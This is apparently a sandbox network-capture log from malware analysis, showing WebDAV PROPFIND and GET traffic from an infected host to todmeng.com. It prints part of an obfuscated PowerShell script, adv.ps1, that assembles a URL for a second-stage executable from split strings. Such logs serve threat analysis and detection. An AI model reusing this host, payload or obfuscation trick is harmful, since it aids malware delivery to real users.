2024-12-13 15:43:19 UTC	166	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:19 UTC	227	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 13 Dec 2024 15:43:19 GMT Server: Apache/2.4.58 (Ubuntu) Location: https://todmeng.com/webdav/ Content-Length: 313 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:19 UTC	313	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 6f 64 6d 65 6e 67 2e 63 6f 6d 2f 77 65 62 64 61 76 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://todmeng.com/webdav/">here</a>.</p><hr><address>Apache/2.4.58 (Ubuntu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.3	49758	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:21 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:21 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:21 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:21 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.3	49757	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:21 UTC	167	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:21 UTC	179	IN	HTTP/1.1 207 Multi-Status Date: Fri, 13 Dec 2024 15:43:21 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 838 Connection: close Content-Type: text/xml; charset="utf-8"
2024-12-13 15:43:21 UTC	838	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 0a 3c 44 3a 72 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3a 6c 70 31 3d 22 44 41 56 3a 22 20 78 6d 6c 6e 73 3a 6c 70 32 3d 22 68 74 74 70 3a 2f 2f 61 70 61 63 68 65 2e 6f 72 67 2f 64 61 76 2f 70 72 6f 70 73 2f 22 3e 0a 3c 44 3a 68 72 65 66 3e 2f 77 65 62 64 61 76 2f 3c 2f 44 3a 68 72 65 66 3e 0a 3c 44 3a 70 72 6f 70 73 74 61 74 3e 0a 3c 44 3a 70 72 6f 70 3e 0a 3c 6c 70 31 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 6c 70 31 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 0a 3c 6c 70 31 3a 63 72 65 61 74 69 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><D:multistatus xmlns:D="DAV:"><D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"><D:href>/webdav/</D:href><D:propstat><D:prop><lp1:resourcetype><D:collection/></lp1:resourcetype><lp1:creation

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.3	49764	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:23 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:23 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:23 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:23 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.3	49765	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:23 UTC	174	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 61 64 76 2e 70 73 31 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/adv.ps1 HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:24 UTC	179	IN	HTTP/1.1 207 Multi-Status Date: Fri, 13 Dec 2024 15:43:23 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 838 Connection: close Content-Type: text/xml; charset="utf-8"
2024-12-13 15:43:24 UTC	838	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 0a 3c 44 3a 72 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3a 6c 70 31 3d 22 44 41 56 3a 22 20 78 6d 6c 6e 73 3a 6c 70 32 3d 22 68 74 74 70 3a 2f 2f 61 70 61 63 68 65 2e 6f 72 67 2f 64 61 76 2f 70 72 6f 70 73 2f 22 3e 0a 3c 44 3a 68 72 65 66 3e 2f 77 65 62 64 61 76 2f 61 64 76 2e 70 73 31 3c 2f 44 3a 68 72 65 66 3e 0a 3c 44 3a 70 72 6f 70 73 74 61 74 3e 0a 3c 44 3a 70 72 6f 70 3e 0a 3c 6c 70 31 3a 72 65 73 6f 75 72 63 65 74 79 70 65 2f 3e 0a 3c 6c 70 31 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 31 32 2d 31 32 54 32 30 3a 32 39 3a 30 34 5a 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><D:multistatus xmlns:D="DAV:"><D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"><D:href>/webdav/adv.ps1</D:href><D:propstat><D:prop><lp1:resourcetype/><lp1:creationdate>2024-12-12T20:29:04Z<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.3	49771	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:25 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:25 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:25 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:25 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.3	49772	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:25 UTC	183	OUT	GET /webdav/adv.ps1 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: todmeng.com
2024-12-13 15:43:26 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:43:25 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Thu, 12 Dec 2024 20:18:32 GMT ETag: "87d-629186b097600" Accept-Ranges: bytes Content-Length: 2173 Connection: close
2024-12-13 15:43:26 UTC	2173	IN	Data Raw: 24 7a 20 3d 20 22 74 22 3b 0d 0a 24 6d 20 3d 20 22 6f 22 3b 0d 0a 24 6c 20 3d 20 22 64 22 3b 0d 0a 24 66 20 3d 20 22 6d 22 3b 0d 0a 24 78 20 3d 20 22 65 22 3b 0d 0a 24 6a 20 3d 20 22 6e 22 3b 0d 0a 24 6b 20 3d 20 22 67 22 3b 0d 0a 24 73 20 3d 20 22 2e 22 3b 0d 0a 24 6e 20 3d 20 22 63 22 3b 0d 0a 24 74 20 3d 20 22 6f 22 3b 0d 0a 24 67 20 3d 20 22 6d 22 3b 0d 0a 24 71 20 3d 20 22 2f 22 3b 0d 0a 24 68 20 3d 20 22 77 65 62 22 3b 0d 0a 24 75 20 3d 20 22 64 61 76 22 3b 0d 0a 24 62 20 3d 20 22 2f 22 3b 0d 0a 24 76 20 3d 20 22 69 6e 66 72 61 22 3b 0d 0a 24 77 20 3d 20 22 72 65 63 6f 72 22 3b 0d 0a 24 72 20 3d 20 22 64 65 72 22 3b 0d 0a 24 79 20 3d 20 22 2e 22 3b 0d 0a 24 63 20 3d 20 22 65 22 3b 0d 0a 24 65 20 3d 20 22 78 22 3b 0d 0a 24 69 20 3d 20 22 65 22 3b 0d Data Ascii: $z = "t";$m = "o";$l = "d";$f = "m";$x = "e";$j = "n";$k = "g";$s = ".";$n = "c";$t = "o";$g = "m";$q = "/";$h = "web";$u = "dav";$b = "/";$v = "infra";$w = "recor";$r = "der";$y = ".";$c = "e";$e = "x";$i = "e";

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.3	49778	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:27 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:27 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:27 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:27 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.3	49784	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:29 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:30 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:29 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:30 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.3	49785	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:29 UTC	196	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 36 34 5f 36 31 35 32 2e 61 6d 73 69 2e 63 73 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls/amsi64_6152.amsi.csv HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:30 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:29 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:30 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.3	49790	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
